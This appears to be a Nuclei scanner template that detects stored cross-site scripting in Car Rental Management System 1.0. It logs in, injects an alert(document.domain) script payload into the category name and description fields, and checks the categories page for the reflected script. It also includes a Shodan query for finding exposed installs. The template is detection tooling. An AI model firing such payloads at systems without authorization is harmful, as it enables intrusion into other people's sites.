id: carrental-xss

info:
  name: Car Rental Management System 1.0 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Car Rental Management System 1.0 contains a cross-site scripting vulnerability via admin/ajax.php?action=save_category in Name and Description parameter.
  reference:
    - https://www.exploit-db.com/exploits/49546
    - https://www.sourcecodester.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
    cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.html:"Car Rental Management System"
    product: car_rental_management_system
    vendor: car_rental_management_system_project
  tags: xss,cms,authenticated,edb,intrusive

http:
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /admin/ajax.php?action=save_category HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCMJ5bh3B6m9767Em

        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
        Content-Disposition: form-data; name="id"

        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
        Content-Disposition: form-data; name="name"

        </script><script>alert(document.domain)</script>
        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
        Content-Disposition: form-data; name="description"

        <script>alert(document.domain)</script>
        ------WebKitFormBoundaryCMJ5bh3B6m9767Em--
      - |
        GET /admin/index.php?page=categories HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<p>Name: <b></script><script>alert(document.domain)</script></b>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210098912c4d3795195fbeebc37bf15f9a0af83bb912d412dc2039b0acbcc8d50bb9022100c293e32826ff4dea159b9ee98abe7d594f61235b9222e96bf28e7aead65ba88b:922c64590222798bb761d5b6d8e72950